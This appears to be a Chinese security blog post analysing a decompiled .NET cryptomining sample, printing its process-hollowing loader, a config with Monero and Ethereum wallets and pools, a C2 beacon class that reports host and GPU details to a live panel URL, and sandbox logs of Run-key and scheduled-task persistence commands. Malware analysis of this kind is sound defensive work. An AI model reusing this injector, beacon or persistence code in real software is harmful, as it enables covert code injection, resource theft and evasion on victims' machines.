			private static extern long VirtualAllocEx(long hProcess, long lpAddress, long dwSize, uint flAllocationType, uint flProtect);

			// Token: 0x0600000C RID: 12
			[DllImport("kernel32.dll")]
			private static extern long WriteProcessMemory(long hProcess, long lpBaseAddress, byte[] lpBuffer, int nSize, long written);

			// Token: 0x0600000D RID: 13
			[DllImport("ntdll.dll")]
			private static extern uint ZwUnmapViewOfSection(long ProcessHandle, long BaseAddress);

			// Token: 0x0600000E RID: 14
			[DllImport("kernel32.dll")]
			private static extern bool SetThreadContext(long hThread, IntPtr lpContext);

			// Token: 0x0600000F RID: 15
			[DllImport("kernel32.dll")]
			private static extern bool GetThreadContext(long hThread, IntPtr lpContext);

			// Token: 0x06000010 RID: 16
			[DllImport("kernel32.dll")]
			private static extern uint ResumeThread(long hThread);

			// Token: 0x06000011 RID: 17
			[DllImport("kernel32.dll")]
			private static extern bool CloseHandle(long handle);

			// Token: 0x06000012 RID: 18 RVA: 0x00002DB8 File Offset: 0x00000FB8
			/// <summary>
			/// Hollows <paramref name="host"/> with the PE image in
			/// <paramref name="payloadBuffer"/> and passes <paramref name="args"/>
			/// on the child's command line. The header reads are for a PE32+
			/// (64-bit) image; the structure layout is taken on trust, with no
			/// bounds or signature checks.
			/// </summary>
			/// <param name="payloadBuffer">Raw PE32+ image (the unpacked miner).</param>
			/// <param name="host">Path of the executable to start and replace.</param>
			/// <param name="args">Arguments appended to the host's command line.</param>
			public unsafe static void Run(byte[] payloadBuffer, string host, string args)
			{
				// PE32+ header fields, in order: e_lfanew, SizeOfImage, SizeOfHeaders, AddressOfEntryPoint,
				// NumberOfSections, SizeOfOptionalHeader, ImageBase.
				int num = Marshal.ReadInt32(payloadBuffer, 60);
				int num2 = Marshal.ReadInt32(payloadBuffer, num + 24 + 56);
				int nSize = Marshal.ReadInt32(payloadBuffer, num + 24 + 60);
				int num3 = Marshal.ReadInt32(payloadBuffer, num + 24 + 16);
				short num4 = Marshal.ReadInt16(payloadBuffer, num + 4 + 2);
				short num5 = Marshal.ReadInt16(payloadBuffer, num + 4 + 16);
				long num6 = Marshal.ReadInt64(payloadBuffer, num + 24 + 24);
				Program.PE.StartupInfo structure = default(Program.PE.StartupInfo);
				structure.cb = (uint)Marshal.SizeOf<Program.PE.StartupInfo>(structure);
				structure.wShowWindow = 0; // hidden window
				structure.dwFlags = 1U;
				byte[] array = new byte[24]; // PROCESS_INFORMATION
				IntPtr intPtr = Marshal.AllocHGlobal(77); // thread CONTEXT buffer; NOTE(review): 77 bytes is far smaller than an x64 CONTEXT, later accesses at 128/136 overrun it
				string text = host;
				if (!string.IsNullOrEmpty(args))
				{
					text = text + " " + args;
				}
				string currentDirectory = Directory.GetCurrentDirectory();
				Marshal.WriteInt32(intPtr, 48, 1048603); // ContextFlags
				Program.PE.CreateProcess(null, text, IntPtr.Zero, IntPtr.Zero, true, 4U, IntPtr.Zero, currentDirectory, &structure, array); // 4U = CREATE_SUSPENDED
				long num7 = Marshal.ReadInt64(array, 0); // hProcess
				long num8 = Marshal.ReadInt64(array, 8); // hThread
				Program.PE.ZwUnmapViewOfSection(num7, num6); // drop the host image at the payload's preferred base
				Program.PE.VirtualAllocEx(num7, num6, (long)num2, 12288U, 64U); // MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
				Program.PE.WriteProcessMemory(num7, num6, payloadBuffer, nSize, 0L); // headers
				for (short num9 = 0; num9 < num4; num9 += 1)
				{
					// One 40-byte section header per iteration: VirtualAddress @12, SizeOfRawData @16, PointerToRawData @20.
					byte[] array2 = new byte[40];
					Buffer.BlockCopy(payloadBuffer, num + (int)(24 + num5) + (int)(40 * num9), array2, 0, 40);
					int num10 = Marshal.ReadInt32(array2, 12);
					int num11 = Marshal.ReadInt32(array2, 16);
					int srcOffset = Marshal.ReadInt32(array2, 20);
					byte[] array3 = new byte[num11];
					Buffer.BlockCopy(payloadBuffer, srcOffset, array3, 0, array3.Length);
					Program.PE.WriteProcessMemory(num7, num6 + (long)num10, array3, array3.Length, 0L);
				}
				// Redirect the suspended main thread: record the new image base in the child and set the
				// entry point to ImageBase + AddressOfEntryPoint, then resume.
				Program.PE.GetThreadContext(num8, intPtr);
				byte[] bytes = BitConverter.GetBytes(num6);
				long num12 = Marshal.ReadInt64(intPtr, 136);
				Program.PE.WriteProcessMemory(num7, num12 + 16L, bytes, 8, 0L);
				Marshal.WriteInt64(intPtr, 128, num6 + (long)num3);
				Program.PE.SetThreadContext(num8, intPtr);
				Program.PE.ResumeThread(num8);
				Marshal.FreeHGlobal(intPtr);
				Program.PE.CloseHandle(num7);
				Program.PE.CloseHandle(num8);
			}

			// Token: 0x06000013 RID: 19 RVA: 0x00002FDC File Offset: 0x000011DC
			/// <summary>
			/// Rounds <paramref name="source"/> up to a multiple of
			/// <paramref name="alignment"/>. Not referenced anywhere in this listing.
			/// </summary>
			private static IntPtr Align(IntPtr source, int alignment)
			{
				long num = source.ToInt64() + (long)(alignment - 1);
				return new IntPtr((long)alignment * (num / (long)alignment));
			}

			// Token: 0x02000006 RID: 6
			// Partial STARTUPINFO (104 bytes, x64 layout): only cb, dwFlags and wShowWindow are populated.
			[StructLayout(LayoutKind.Explicit, Size = 104)]
			public struct StartupInfo
			{
				// Token: 0x04000002 RID: 2
				[FieldOffset(0)]
				public uint cb;

				// Token: 0x04000003 RID: 3
				[FieldOffset(60)]
				public uint dwFlags;

				// Token: 0x04000004 RID: 4
				[FieldOffset(64)]
				public ushort wShowWindow;
			}
		}
	}
}

 

 

另外一个配置类和Host类:

using System;

namespace VolVeRFINAL
{
	// Token: 0x02000007 RID: 7
	internal class config
	{
		// Analyst note: builder-generated configuration for the second stage.
		// Several of the string "switches" below do not match the literals
		// Program.Main compares them against (forceUAC is checked against
		// "true", bypassUAC against "owdoaodsoa"), so those features are off in
		// this build. The wallets, pools, mutex, paths and names are the
		// host-based / network IoCs for this sample.

		// Token: 0x04000005 RID: 5
		// XMRig --max-cpu-usage value (percent).
		public static string moneroUsage = "25";

		// Token: 0x04000006 RID: 6
		// Monero payout address passed to XMRig with -u.
		public static string moneroWallet = "8BEkM3VeZHUQgFevjUBjpYKHKtfbMS9xKMEnWezdD2Rp4BAcsASXFPV6sWYbDU3N1jgPcERvcqUSfLtD6EQiR3AtB2LGDjj";

		// Token: 0x04000007 RID: 7
		// Monero pool (host:port); the only miner endpoint actually contacted in this build.
		public static string moneroPool = "pool.hashvault.pro:80";

		// Token: 0x04000008 RID: 8
		// Ethereum Classic wallet / pool / worker for ethminer (path not reachable, see Program.Main).
		public static string etcWallet = "0x5a285Cddf2057ffe8b78E2904e2939271C94a957";

		// Token: 0x04000009 RID: 9
		public static string etcPool = "etc.2miners.com:1010";

		// Token: 0x0400000A RID: 10
		// Ethereum wallet / pool / worker for ethminer (path not reachable, see Program.Main).
		public static string ethWallet = "0xac956d72ef62ead6cadcbce4338ed56fc39f2976";

		// Token: 0x0400000B RID: 11
		public static string ethPool = "eth.2miners.com:2020";

		// Token: 0x0400000C RID: 12
		public static string ethWorker = "ethrig";

		// Token: 0x0400000D RID: 13
		public static string etcWorker = "etcrig";

		// Token: 0x0400000E RID: 14
		// Named mutex created by Program.UMutexAC; a host-based indicator.
		public static string mutex = "ZZIOREUEZCTVTVVMOS";

		// Token: 0x0400000F RID: 15
		// Install directory: %AppData%\Windows (also receives opersystem.exe).
		public static string folder = Environment.GetEnvironmentVariable("AppData") + "\\Windows";

		// Token: 0x04000010 RID: 16
		// Name of the self-copy referenced by the scheduled task and the Run key.
		public static string FileName = "winupdate.exe";

		// Token: 0x04000011 RID: 17
		// HKCU\...\CurrentVersion\Run value name.
		public static string RegName = "winupdate";

		// Token: 0x04000012 RID: 18
		// Program.Main compares this against "owdoaodsoa", so the SilentCleanup UAC bypass is disabled here.
		public static string bypassUAC = "true";

		// Token: 0x04000013 RID: 19
		// Enables Analysis.isVirtualMachine() exit check.
		public static string antiSandbox = "true";

		// Token: 0x04000014 RID: 20
		// Enables Analysis.DetectSandboxie() exit check (despite the name, no debugger check is visible).
		public static string antiDebugger = "true";

		// Token: 0x04000015 RID: 21
		// Program.Main compares this against "true", so the repeated-runas prompting (Defolt) is disabled here.
		public static string forceUAC = "forceder";

		// Token: 0x04000016 RID: 22
		// Enables the clipboard address-swapping loop.
		public static string Hipper = "true";

		// Token: 0x04000017 RID: 23
		// Enables the beacon to Host.adm.
		public static string WebPanel = "true";

		// Token: 0x04000018 RID: 24
		// Enables dropping and running resource iqdisakwe as opersystem.exe.
		public static string dwudauiadjws = "true";
	}
}



using System;
using System.IO;
using System.Management;
using System.Net;
using System.Security.Principal;

namespace VolVeRFINAL
{
	// Token: 0x0200000A RID: 10
	internal class Host
	{
		// Analyst note: C2 / reporting component. getTasks() sends host and GPU
		// details to the URL in adm and parses the reply into task triples, but
		// Program.Main discards the result, so in this build the request is a
		// beacon only. Network indicator: HTTP GET to adm with the fixed
		// Firefox/53 User-Agent and a "?hwid=" query string.

		// Token: 0x06000022 RID: 34 RVA: 0x000032D8 File Offset: 0x000014D8
		/// <summary>
		/// Fetches <paramref name="url"/> with default credentials and a fixed
		/// browser User-Agent; returns the body, or null on any error. The
		/// response and reader are never disposed.
		/// </summary>
		/// <param name="url">Full URL to request.</param>
		/// <returns>Response body as text, or null.</returns>
		public static string get(string url)
		{
			string result;
			try
			{
				WebRequest webRequest = WebRequest.Create(url);
				webRequest.Credentials = CredentialCache.DefaultCredentials;
				((HttpWebRequest)webRequest).UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";
				StreamReader streamReader = new StreamReader(webRequest.GetResponse().GetResponseStream());
				result = streamReader.ReadToEnd();
			}
			catch
			{
				result = null;
			}
			return result;
		}

		// Token: 0x06000023 RID: 35 RVA: 0x00003338 File Offset: 0x00001538
		/// <summary>
		/// Reports to the panel and parses its reply. Query parameters: hwid =
		/// current Windows account name, gpuname = Win32_VideoController names,
		/// mining = GPU memory in GiB (capped at 3 by the uint read, see
		/// Program.Main), active = XMR plus " | ETC"/" | ETH" by the same size
		/// test. The reply is split on '|' and each item on ';' into
		/// "upd|dwl;field1;field2". A null reply from get() makes Split throw;
		/// the caller swallows that.
		/// </summary>
		/// <returns>One "kind;a;b" string per reply item (null entries where parsing failed).</returns>
		public static string[] getTasks()
		{
			int num = 0;
			ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("select AdapterRAM from Win32_VideoController");
			foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
			{
				ManagementObject managementObject = (ManagementObject)managementBaseObject;
				uint? num2 = managementObject.Properties["AdapterRAM"].Value as uint?;
				if (num2 != null)
				{
					num = (int)(num2 / 1048576U).Value; // bytes -> MiB
				}
			}
			int num3 = num / 1024; // MiB -> GiB
			string text = "";
			using (ManagementObjectSearcher managementObjectSearcher2 = new ManagementObjectSearcher("select * from Win32_VideoController"))
			{
				foreach (ManagementBaseObject managementBaseObject2 in managementObjectSearcher2.Get())
				{
					ManagementObject managementObject2 = (ManagementObject)managementBaseObject2;
					text = text + managementObject2["Name"].ToString() + "; ";
				}
			}
			string text2 = "";
			if (num3 > 4)
			{
				text2 = " | ETC";
			}
			if (num3 > 8)
			{
				text2 = " | ETH";
			}
			// Beacon: GET adm?hwid=<user>&gpuname=<names>&mining=<GiB>&active=XMR[ | ETC| | ETH]
			string[] array = Host.get(string.Concat(new object[]
			{
				Host.adm,
				"?hwid=",
				WindowsIdentity.GetCurrent().Name,
				"&gpuname=",
				text,
				"&mining=",
				num3,
				"&active=XMR",
				text2
			})).Split(new char[]
			{
				'|'
			});
			string[] array2 = new string[array.Length];
			int num4 = 0;
			foreach (string text3 in array)
			{
				try
				{
					string[] array4 = text3.Split(new char[]
					{
						';'
					});
					string text4 = array4[0].Equals("Update") ? "upd" : "dwl"; // task kind: update vs download
					string text5 = array4[1];
					string text6 = array4[2];
					array2[num4] = string.Concat(new string[]
					{
						text4,
						";",
						text5,
						";",
						text6
					});
				}
				catch (Exception)
				{
				}
				num4++;
			}
			return array2;
		}

		// Token: 0x0400001B RID: 27
		// Panel endpoint (network IoC).
		private static string adm = "http://f0702521.xsph.ru/cmd.php";
	}
}

  

好了,使用GPT4综合分析下:

1. config 类:这个类主要用于存储配置信息,包括各种钱包地址、矿池地址、工作名、互斥量、文件名、注册名等。这些配置信息可能会被其他类或方法使用。

 
internal class config
{
    public static string moneroUsage = "25";
    public static string moneroWallet = "8BEkM3VeZHUQgFevjUBjpYKHKtfbMS9xKMEnWezdD2Rp4BAcsASXFPV6sWYbDU3N1jgPcERvcqUSfLtD6EQiR3AtB2LGDjj";
    // ... other configuration values (see the full config class above) ...
}
 

2. Host 类:这个类主要用于网络请求和获取系统信息。get 方法用于发送网络请求并获取响应,getTasks 方法用于获取系统的显卡信息和挖矿任务。

 
internal class Host
{
    public static string get(string url)
    {
        // ... send the HTTP request and return the response body (see the full Host class above) ...
    }
 
    public static string[] getTasks()
    {
        // ... collect GPU information and fetch the task list from the panel ...
    }
    private static string adm = "http://f0702521.xsph.ru/cmd.php";
}
 

总的来说,这两个类可能是某种挖矿软件的一部分,用于配置挖矿参数和执行挖矿任务!

 

Program 类是一个主程序类,它包含了一些方法用于执行特定的操作。这个类可能是某种恶意软件的一部分,具体功能如下:

1. UMutexAC 方法:创建一个互斥量,用于防止程序的多个实例同时运行。

2. Defolt 方法:尝试以管理员权限运行程序。

3. Main 方法:这是程序的入口点,它执行了一系列的操作,包括删除和复制文件,创建互斥量,检查是否有管理员权限,如果没有则创建计划任务以获取权限,检查是否在沙箱或调试器中运行,如果是则退出,启动挖矿进程,检查剪贴板中的内容,如果是特定格式的地址则替换为预设的地址。

4. Powershell 方法:执行Powershell命令。

5. UAC 方法:尝试绕过用户账户控制(UAC),获取管理员权限。

6. AlwaysNotify 类:检查系统的UAC设置,如果设置为总是通知,则退出程序。

7. Clipboard 类:获取和设置剪贴板的内容。

8. PE 类:执行PE文件的加载和运行。


看下微步沙箱的结果:

 

共分析了23个进程
1b3adf.exe
(PID:3260)
"C:\tmpejxdxt\1b3adf.exe"
powershell.exe
(PID:3436)
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'winupdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'winupdate' -Value '"C:\Users\Admin\AppData\Roaming\Windows\winupdate.exe"' -PropertyType 'String'
opersystem.exe
(PID:3592)
"C:\Users\Admin\AppData\Roaming\Windows\opersystem.exe"
wscript.exe
(PID:3704)
"C:\Windows\System32\WScript.exe" "C:\Portnet\9LUf7xQNOlUBbNUxzKuIYqFs7hpLD.vbe"
cmd.exe
(PID:3864)
C:\Windows\system32\cmd.exe /c ""C:\Portnet\GkY25ZfqKtEhI7it2.bat" "
Agentprovidercomponent.exe
(PID:3940)
"C:\Portnet\Agentprovidercomponent.exe"
schtasks.exe
(PID:2296)
schtasks.exe /create /tn "1b3adf1" /sc MINUTE /mo 10 /tr "'C:\py\1b3adf.exe'" /f
schtasks.exe
(PID:2524)
schtasks.exe /create /tn "1b3adf" /sc ONLOGON /tr "'C:\py\1b3adf.exe'" /rl HIGHEST /f
schtasks.exe
(PID:2692)
schtasks.exe /create /tn "1b3adf1" /sc MINUTE /mo 14 /tr "'C:\py\1b3adf.exe'" /rl HIGHEST /f
schtasks.exe
(PID:2944)
schtasks.exe /create /tn "WeChatW" /sc MINUTE /mo 6 /tr "'C:\Windows\Tasks\WeChat.exe'" /f
schtasks.exe
(PID:2888)
schtasks.exe /create /tn "WeChat" /sc ONLOGON /tr "'C:\Windows\Tasks\WeChat.exe'" /rl HIGHEST /f
schtasks.exe
(PID:3048)
schtasks.exe /create /tn "WeChatW" /sc MINUTE /mo 8 /tr "'C:\Windows\Tasks\WeChat.exe'" /rl HIGHEST /f
schtasks.exe
(PID:2348)
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft.NET\lsm.exe'" /f
schtasks.exe
(PID:3388)
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files\Microsoft.NET\lsm.exe'" /rl HIGHEST /f
1b3adf.exe
(PID:3556)
C:\py\1b3adf.exe
schtasks.exe
(PID:3740)
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft.NET\lsm.exe'" /rl HIGHEST /f
WeChat.exe
(PID:3516)
C:\Windows\Tasks\WeChat.exe
schtasks.exe
(PID:3796)
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\py\cmd.exe'" /f
schtasks.exe
(PID:856)
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\py\cmd.exe'" /rl HIGHEST /f
schtasks.exe
(PID:2440)
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\py\cmd.exe'" /rl HIGHEST /f
schtasks.exe
(PID:2488)
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\py\Idle.exe'" /f
lsm.exe
(PID:2984)
"C:\Program Files\Microsoft.NET\lsm.exe"
schtasks.exe
(PID:2856)
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\py\Idle.exe'" /rl HIGHEST /f

 

追下 该PE文件的来源:  

 

 就是下面的出处了:

 

// Token: 0x06004272 RID: 17010 RVA: 0x000F61C0 File Offset: 0x000F43C0
		/// <summary>
		/// Framework method (appears to be decompiled from mscorlib's Assembly
		/// class). Returns the AppDomain manager's EntryAssembly, creating a
		/// default AppDomainManager when none is set. Included here because the
		/// loader stub's Dsydadaydas() calls GetEntryAssembly().Location to read
		/// its own file - this is where the key and payload are read from.
		/// </summary>
		[SecuritySafeCritical]
		public static Assembly GetEntryAssembly()
		{
			AppDomainManager appDomainManager = AppDomain.CurrentDomain.DomainManager;
			if (appDomainManager == null)
			{
				appDomainManager = new AppDomainManager();
			}
			return appDomainManager.EntryAssembly;
		}

  

 

posted @ 2023-08-23 17:52  bonelee